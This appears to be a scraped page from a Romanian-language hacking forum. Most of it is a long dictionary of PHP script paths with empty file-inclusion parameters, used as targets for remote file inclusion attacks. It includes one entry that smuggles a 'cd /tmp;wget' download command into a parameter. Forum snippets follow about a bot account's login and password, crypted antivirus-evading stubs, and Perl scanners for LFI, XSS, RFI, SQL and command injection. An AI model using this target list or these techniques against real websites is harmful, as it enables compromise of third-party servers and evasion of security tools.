phpBB/includes/pafiledb_constants.php?module_root_path= pafiledb/includes/pafiledb_constants.php?module_root_path= auth/auth.php?phpbb_root_path= auth/auth_phpbb/phpbb_root_path= apc-aa/cron.php3?GLOBALS[AA_INC_PATH]= apc-aa/cached.php3?GLOBALS[AA_INC_PATH]= infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]= phpdig/includes/config.php?relative_script_path= includes/phpdig/includes/config.php?relative_script_path= includes/dbal.php?eqdkp_root_path= eqdkp/includes/dbal.php?eqdkp_root_path= dkp/includes/dbal.php?eqdkp_root_path= path/include/SQuery/gameSpy2.php?libpath= include/global.php?GLOBALS[includeBit]= topsites/config.php?returnpath= manager/frontinc/prepend.php?_PX_config[manager_path]= ubbthreads/addpost_newpoll.php?addpoll=thispath= forum/addpost_newpoll.php?thispath= forums/addpost_newpoll.php?thispath= ubbthreads/ubbt.inc.php?thispath= forums/ubbt.inc.php?thispath= forum/ubbt.inc.php?thispath= forum/admin/addentry.php?phpbb_root_path= admin/addentry.php?phpbb_root_path= index.php?f= index.php?act= ipchat.php?root_path= includes/orderSuccess.inc.php?glob[rootDir]= stats.php?dir[func]=dir[base]= ladder/stats.php?dir[base]= ladders/stats.php?dir[base]= sphider/admin/configset.php?settings_dir= admin/configset.php?settings_dir= vwar/admin/admin.php?vwar_root= modules/vwar/admin/admin.php?vwar_root= modules/vWar_Account/includes/get_header.php?vwar_root= modules/vWar_Account/includes/functions_common.php?vwar_root2= sphider/admin/configset.php?settings_dir= admin/configset.php?settings_dir= impex/ImpExData.php?systempath= forum/impex/ImpExData.php?systempath= forums/impex/ImpExData.php?systempath= application.php?base_path= index.php?theme_path= become_editor.php?theme_path= add.php?theme_path= bad_link.php?theme_path= browse.php?theme_path= detail.php?theme_path= fav.php?theme_path= get_rated.php?theme_path= login.php?theme_path= mailing_list.php?theme_path= new.php?theme_path= modify.php?theme_path= pick.php?theme_path= power_search.php?theme_path= rating.php?theme_path= register.php?theme_path= review.php?theme_path= rss.php?theme_path= search.php?theme_path= send_pwd.php?theme_path= sendmail.php?theme_path= tell_friend.php?theme_path= top_rated.php?theme_path= user_detail.php?theme_path= user_search.php?theme_path= invoice.php?base_path= cgi-bin//classes/adodbt/sql.php?classes_dir= cgi-bin/install/index.php?G_PATH= cgi-bin/include/print_category.php?dir= includes/class_template.php?quezza_root_path= bazar/classified_right.php?language_dir= classified_right.php?language_dir= phpBazar/classified_right.php?language_dir= chat/messagesL.php3?cmd= phpMyChat/chat/messagesL.php3?cmd= bbs/include/write.php?dir= visitorupload.php?cmd= modules/center/admin/accounts/process.php?module_path]= index.php?template= armygame.php?libpath= lire.php?rub= pathofhostadmin/?page= apa_phpinclude.inc.php?apa_module_basedir= index.php?req_path= research/boards/encapsbb-0.3.2_fixed/index_header.php?root= Farsi1/index.php?archive= index.php?archive= show_archives.php?template= forum/include/common.php?pun_root= pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]= vuln.php?= cgi-bin//include/write.php?dir= admin/common.inc.php?basepath= pm/lib.inc.php?sfx= pm/lib.inc.php?pm_path= artmedic-kleinanzeigen-path/index.php?id= index.php?pagina= osticket/include/main.php?include_dir= include/main.php?config[search_disp]=include_dir= phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]= quick_reply.php?phpbb_root_path= zboard/include/write.php?dir= PATH/admin/plog-admin-functions.php?configbasedir= path_to_phpgreetz/content.php?content= path_to_qnews/q-news.php?id= _conf/core/common-tpl-vars.php?confdir= votebox.php?VoteBoxPath= al_initialize.php?alpath= include/db.php?GLOBALS[rootdp]= modules/news/archivednews.php?GLOBALS[language_home]= protection.php?siteurl= modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= index2.php?includes_dir= classes.php?LOCAL_PATH= extensions/moblog/moblog_lib.php?basedir= modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= phpWebLog/include/init.inc.php?G_PATH= admin/objects.inc.php4?Server= trg_news30/trgnews/install/article.php?dir= block.php?Include= arpuivo.php?data= path_to_gallery/setup/index.php?GALLERY_BASEDIR= include/help.php?base= index.php?[Home]= path_to_script/block.php?Include= examples/phonebook.php?page= PHPNews/auth.php?path= include/print_category.php?dir= skin/zero_vote/login.php?dir= skin/zero_vote/setup.php?dir= skin/zero_vote/ask_password.php?dir= gui/include/sql.php?include_path= webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini= email.php?login=cer_skin= PhotoGal/ops/gals.php?news_file= index.php?custom= loginout.php?cutepath= oneadmin/config.php?path[docroot]= xcomic/initialize.php?xcomicRootPath= skin/zero_vote/setup.php?dir= skin/zero_vote/error.php? dir= admin_modules/admin_module_captions.inc.php?config[path_src_include]= admin_modules/admin_module_rotimage.inc.php?config[path_src_include]= admin_modules/admin_module_delcomments.inc.php?config[path_src_include]= admin_modules/admin_module_edit.inc.php?config[path_src_include]= admin_modules/admin_module_delimage.inc.php?config[path_src_include]= admin_modules/admin_module_deldir.inc.php?config[path_src_include]= src/index_overview.inc.php?config[path_src_include]= src/index_leftnavbar.inc.php?config[path_src_include]= src/index_image.inc.php?config[path_src_include]= src/image-gd.class.php?config[path_src_include]= src/image.class.php?config[path_src_include]= src/album.class.php?config[path_src_include]= src/show_random.inc.php?config[path_src_include]= src/main.inc.php?config[path_src_include]= src/index_passwd-admin.inc.php?config[path_admin_include]= yappa-ng/src/index_overview.inc.php?config[path_src_include]= admin_modules/admin_module_captions.inc.php?config[path_src_include]= admin_modules/admin_module_rotimage.inc.php?config[path_src_include]= admin_modules/admin_module_delcomments.inc.php?config[path_src_include]= admin_modules/admin_module_edit.inc.php?config[path_src_include]= admin_modules/admin_module_delimage.inc.php?config[path_src_include]= admin_modules/admin_module_deldir.inc.php?config[path_src_include]= src/index_overview.inc.php?config[path_src_include]= src/image-gd.class.php?config[path_src_include]= src/image.class.php?config[image_module]= src/album.class.php?config[path_src_include]= src/show_random.inc.php?config[path_src_include]= src/main.inc.php?config[path_src_include]= includes/db_adodb.php?baseDir= includes/db_connect.php?baseDir= includes/session.php?baseDir= modules/projects/gantt.php?dPconfig[root_dir]= modules/projects/gantt2.php?dPconfig[root_dir]= modules/projects/vw_files.php?dPconfig[root_dir]= modules/admin/vw_usr_roles.php?baseDir= modules/public/calendar.php?baseDir= modules/public/date_format.php?baseDir= modules/tasks/gantt.php?baseDir= mantis/login_page.php?g_meta_include_file= phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY= modules/My_eGallery/public/displayCategory.php?basepath= dotproject/modules/files/index_table.php?root_dir= nukebrowser.php?filnavn= bug_sponsorship_list_view_inc.php?t_core_path= modules/coppermine/themes/coppercop/theme.php?THEME_DIR= modules/coppermine/themes/maze/theme.php?THEME_DIR= modules/coppermine/include/init.inc.php?CPG_M_DIR= includes/calendar.php?phpc_root_path= includes/setup.php?phpc_root_path= phpBB/admin/admin_styles.php?mode= aMember/plugins/db/mysql/mysql.inc.php?config= admin/lang.php?CMS_ADMIN_PAGE= inc/pipe.php?HCL_path= include/write.php?dir= becommunity/community/index.php?pageurl= modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= modules/mod_mainmenu.php?mosConfig_absolute_path= modules/agendax/addevent.inc.php?agendax_path= shoutbox/expanded.php?conf= modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= index.php?page= index.php?pag= index.php?include= index.php?content= index.php?cont= index.php?c= modules/My_eGallery/index.php?basepath= modules/newbb_plus/class/forumpollrenderer.php?bbPath= journal.php?m= index.php?m= links.php?c= forums.php?m= list.php?c= user.php?xoops_redirect= index.php?id= r.php?url= CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]= inc/formmail.inc.php?script_root= include/init.inc.php?G_PATH= backend/addons/links/index.php?PATH= modules/newbb_plus/class/class.forumposts.php?bbPath[path]= modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= protection.php?siteurl= htmltonuke.php?filnavn= mail_autocheck.php?pm_path= index.php?p= modules/4nAlbum/public/displayCategory.php?basepath= e107/e107_handlers/secure_img_render.php?p= include/new-visitor.inc.php?lvc_include_dir= path_of_cpcommerce/_functions.php?prefix= community/modules/agendax/addevent.inc.php?agendax_path= library/editor/editor.php?root= library/lib.php?root= zentrack/index.php?configFile= pivot/modules/module_db.php?pivot_path= main.php?x= myPHPCalendar/admin.php?cal_dir= index.php/main.php?x= index.php?x= index.php?open= index.php?visualizar= template.php?pagina= index.php?inc= includes/include_onde.php?include_file= index.php?pg= index.php?show= index.php?cat= print.php?val1= cmd.php?function= iframe.php?file= os/pointer.php?url= p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM= index.php?file= db.php?path_local= phpGedView/individual.php?PGV_BASE_DIRECTORY= index.php?kietu[url_hit]= phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= Sources/Packages.php?sourcedir= yabbse/Sources/Packages.php?sourcedir= modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= cgi-bin//gadgets/Blog/BlogModel.php?path= cgi-bin//admin.php?cal_dir= gallery/captionator.php?GALLERY_BASEDIR= cgi-bin/main.php?x= Blog/BlogModel.php?path= admin.php?cal_dir= expanded.php?conf= mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= pollvote/pollvote.php?pollname= displayCategory.php?basepath= phpBB2/admin/admin_cash.php?phpbb_root_path= modules/foro/includes/functions_admin.php?phpbb_root_path= modules/Forums/admin/admin_forums.php?phpEx= modules/Forums/admin/admin_disallow.php?phpEx= modules/Forums/admin/admin_smilies.php?phpEx= modules/Forums/admin/admin_board.php?phpEx= modules/Forums/admin/admin_users.php?phpEx= modules/Forums/admin/admin_mass_email.php?phpEx= modules/Forums/admin/admin_forum_prune.php?phpEx= modules/Forums/admin/admin_styles.php?phpbb_root_path= index.php?hc= mt-comments.cgi?id= webcalendar/tools/send_reminders.php?includedir= cmd/product_info.php/products_id/1622/shop_content.php?coID= addevent.inc.php?agendax_path= step_one.php?server_inc= upgrade_album.php?GALLERY_BASEDIR= search.php?cutepath= modules.php?name= wagora/extras//quicklist.php?site= vCard/admin/define.inc.php?match= forum/ubbthreads.php?Cat= admin/includes/classes/spaw/spaw_control.class.php?spaw_root= secure.php?cfgProgDir= modules/My_eGallery/public//inc/?HCL_path= modules/My_eGallery/public/imagen.php?basepath= adlayer.php?layerstyle= Forums/bb_smilies.php?name= modules/Forums/bb_smilies.php?name= gadgets/Blog/BlogModel.php?path= learnlinc/clmcpreload.php?CLPATH= modernbill/samples/news.php?DIR= religions/faq.php?page= forum/viewtopic.php?t= announcements.php?includePath= inc/header.php/step_one.php?server_inc= phpatm/index.php?include_location= gb/form.inc.php3?lang= shannen/index.php?x= family/phpgedview/index.php?PGV_BASE_DIRECTORY= main.php?left= forum/misc.php?action= nucleus/libs/globalfunctions.php?DIR_LIBS= show_archives.php?cutepath= gallery.php= magicforum/misc.php?action= forum/admin/actions/del.php?include_path= index.php?meio= local/investing_industrialeastate1.php?a= modules/coppermine/themes/default/theme.php?THEME_DIR Popper/index.php?childwindow.inc.php?form= class.mysql.php?path_to_bt_dir= include/footer.inc.php?_AMLconfig[cfg_serverpath]= eyeos/desktop.php?baccio= ashnews.php?pathtoashnews= index.php?modpath= becommunity/community/index.php?pageurl= index.php?sqld= modules/module_db.php?pivot_path= catalog/includes/include_once.php?include_file= cgi-bin/calendar.pl?fromTemplate= live/inc/pipe.php?HCL_path= zb41/include/write.php?dir= cgi-bin/awstats.pl?logfile= presse/stampa.php3?azione= inc/step_one_tables.php?server_inc= index.php?mainpage= phpprojekt/lib/authform.inc.php?path_pre= captionator.php?GALLERY_BASEDIR= _head.php?_zb_path=.example.com achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot= gallery/captionator.php?GALLERY_BASEDIR=.example.com globals.php3?LangCookie=.example.com include/msql.php?inc_dir= include/mssql7.php?inc_dir= include/mysql.php?inc_dir= include/oci8.php?inc_dir= include/postgres.php?inc_dir= include/postgres65.php?inc_dir= install.php?phpbb_root_dir= mantis/login_page.php?g_meta_inc_dir= page.php?template= phorum/admin/actions/del.php?include_path= pollensondage.inc.php?app_path= user/agora_user.php?inc_dir= user/ldap_example.php?inc_dir= userlist.php?ME=.example.com _functions.php?prefix= cpcommerce/_functions.php?prefix= ashnews.php?pathtoashnews=cd /tmp;wget eblog/blog.inc.php?xoopsConfig[xoops_url]= b2-tools/gm-2-b2.php?b2inc= includes/include_once.php?include_file= modules.php?name=jokeid= index.php?site= livehelp/inc/pipe.php?HCL_path= hcl/inc/pipe.php?HCL_path= support/faq/inc/pipe.php?HCL_path= help/faq/inc/pipe.php?HCL_path= helpcenter/inc/pipe.php?HCL_path= live-support/inc/pipe.php?HCL_path= gnu3/index.php?doc= gnu/index.php?doc= phpgwapi/setup/tables_update.inc.php?appdir= includes/calendar.php?phpc_root_path= includes/setup.php?phpc_root_path= inc/authform.inc.php?path_pre= include/authform.inc.php?path_pre= web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR= web_statistics//tools/send_reminders.php?includedir= web_statistics//include/write.php?dir= web_statistics//modules/My_eGallery/public/displayCategory.php?basepath= web_statistics//calendar/tools/send_reminders.php?includedir= web_statistics//skin/zero_vote/error.php?dir= web_statistics//coppercop/theme.php?THEME_DIR= includes/header.php?systempath= Gallery/displayCategory.php?basepath= index.inc.php?PATH_Includes= nphp/nphpd.php?nphp_config[LangFile]= ashheadlines.php?pathtoashnews= demo/includes/init.php?user_inc= jaf/index.php?show= inc/shows.inc.php?cutepath= poll/admin/common.inc.php?base_path= sources/post.php?fil_config= bb_lib/checkdb.inc.php?libpach= include/livre_include.php?chem_absolu= index.php?pageurl= derniers_commentaires.php?rep= modules/coppermine/themes/default/theme.php?THEME_DIR= coppermine/themes/maze/theme.php?THEME_DIR= allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]= allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]= agendax/addevent.inc.php?agendax_path= main.php?page= default.php?page= index.php?action= index1.php?p= index2.php?x= index2.php?content= index.php?conteudo= GradeMap/index.php?page= phpopenchat/contrib/yabbse/poc.php?sourcedir= calendar/calendar.php?serverPath= calendar/functions/popup.php?serverPath= calendar/events/header.inc.php?serverPath= calendar/events/datePicker.php?serverPath= calendar/setup/setupSQL.php?serverPath= calendar/setup/header.inc.php?serverPath= install/index.php?G_PATH= support/mailling/maillist/inc/initdb.php?absolute_path= coppercop/theme.php?THEME_DIR= dotproject/modules/projects/addedit.php?root_dir= dotproject/modules/projects/view.php?root_dir= dotproject/modules/projects/vw_files.php?root_dir= dotproject/modules/tasks/addedit.php?root_dir= dotproject/modules/tasks/viewgantt.php?root_dir= My_eGallery/public/displayCategory.php?basepath= index.php?meio.php= index.php?configFile= index.php?do= phpshop/index.php?base_dir= contacts.php?cal_dir= convert-date.php?cal_dir= album_portal.php?phpbb_root_path= mainfile.php?MAIN_PATH= html/affich.php?base= gallery/init.php?HTTP_POST_VARS= ideabox/include.php?gorumDir= stats/modules/My_eGallery/index.php?basepath= stats/include/write.php?dir= stats/tools/send_reminders.php?includedir= index.cgiupgrade_album.php?GALLERY_BASEDIR= pollvote/pollvote.php?pollname includes/page_header.php?dir= index2.php?mosConfig_absolute_path= new/bbs//include/write.php?dir= index.php?mosConfig_absolute_path= modules/My_eGallery/public/inc/?HCL_path= /forum/auth/auth.php?phpbb_root_path= /forum/auth/auth_phpbb/phpbb_root_path= /cutenews/comments.php?cutepath= /library/lib.php?root= /impex/ImpExData.php?systempath= /coppermine/thumbnails.php?lang= /gallery/thumbnails.php?lang= /aWebNews/visview.php?path_to_news= /ashnews.php?pathtoashnews= /4images/index.php?template= /galeri/index.php?template= /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= /components/com_smf/smf.php?mosConfig_absolute_path= /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= /components/com_simpleboard/image_upload.php?sbp= /gallery/index.php?template= /auth/auth.php?phpbb_root_path= /auth/auth_phpbb/phpbb_root_path= /modules/Forums/admin/index.php?phpbb_root_path= /modules/Forums/admin/admin_avatar.php?phpbb_root_path= /modules/Forums/admin/admin_styles.php?phpbb_root_path= /_wk/wk_lang.php?wkPath= /shoutbox/expanded.php?conf= /myPHPCalendar/admin.php?cal_dir= /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= /modules/Forums/admin/admin_board.php?phpEx= /modules/Forums/admin/admin_users.php?phpEx= /library/editor/editor.php?root= /library/lib.php?root= /e107/e107_handlers/secure_img_render.php?p= /modules/My_eGallery/public/displayCategory.php?basepath= /modules/My_eGallery/index.php?basepath= /modules/coppermine/themes/default/theme.php?THEME_DIR= /modules/4nAlbum/public/displayCategory.php?basepath= /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= /modules/coppermine/themes/maze/theme.php?THEME_DIR= /modules/coppermine/include/init.inc.php?CPG_M_DIR= /phpBB/admin/admin_styles.php?mode= /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /index.php?page= /index.php?pag= /index.php?sayfa= /index.php?pg= /index.php?include= /index.php?content= /index.php?p= /index.php?s= /index.php?cont= /index.php?c= /journal.php?m= /index.php?m= /links.php?c= /forums.php?m= /list.php?c= /journal.php?m= /user.php?xoops_redirect= /index.php?id=
  10. User name = sandabot Password = botsanda
  11. Pai ai pierdut stub-ul...creca ti la papat antivirusu"
  12. http://vscan.novirusthanks.org Download pass : Crypted With ARMON-64-->ATOM-128-->BASE-64
  13. Un script scris in perl ce scaneaza dupa vuln LFI
  14. Mi se pare cel mai bun anti pop up Download
  15. Download http://vscan.novirusthanks.org
  16. Degeaba-l encryptez...= 0
  17. Pm pentru link http://vscan.novirusthanks.org
  18. Scaneaza dupa vuln LFI,XSS,RFI,SQL,CMD
  19. Jimmy

    Link-uri

    Cateva link-ri utile. Tutorials from A to Z(spanish) Admin page finder online Xss methods Xss , lfi , sql -Software The best md5 online decrypter Yahoo stuff
  20. KaoticProtocol Anit Boot Download Spark Anti Boot Download Y! Filter Anti Boot Download
  21. Jotti e ca virustotal.
×
×
  • Create New...